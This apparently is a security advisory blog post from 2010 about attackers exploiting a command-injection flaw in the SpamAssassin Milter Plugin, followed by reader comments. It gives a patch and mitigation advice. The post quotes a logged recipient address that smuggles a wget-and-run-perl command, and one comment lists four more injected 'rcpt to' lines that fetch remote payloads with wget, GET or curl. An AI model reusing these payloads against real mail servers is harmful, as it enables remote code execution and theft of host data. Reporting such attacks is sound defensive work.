Spamassassin Milter Plugin Remote Root Attack
Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:
Messages rejected to recipient: root+:|wget
hxxp://www.linux-echo.de/.x/p.txt;perl p.txt: smtp.target.com[10.11.17.18] : User unknown in local recipient
table; from=<blue@attacker.com> to=<root+:|wget
hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)
Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin's milter vulnerability that has been published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).
The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 -- this host appears to be unreachable at the moment though.
Update: SecurityFocus BID 38578
Mitigation: There is a preliminary patch available at the SpamAssassin Milter Plugin project site, bug #29136: SpamAssassin Milter Plugin Input Validation Flaw Lets Remote Users Execute Arbitrary Code: http://savannah.nongnu.org/bugs/index.php?29136
Alternatively, don't use the -x option when running this plugin, as well do not run it as root.
Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.
Comments
BillBixby
Mar 15th 2010
1 decade ago
To double-check I attempted the exploit described at the Full Disclosure link (above) and it didn't work.
bjnord
Mar 16th 2010
1 decade ago
rcpt to: root+:"|wget http://213.186.44.xxx/blue.php"
rcpt to: root+:"|wget http://61.100.185.xxx/busy-1.php"
rcpt to: root+:"|GET http://61.100.185.xxx/busy-2.php"
rcpt to: root+:"|curl http://61.100.185.xxx/busy-3.php"
tbtaylor
Mar 16th 2010
1 decade ago
Matt
Mar 18th 2010
1 decade ago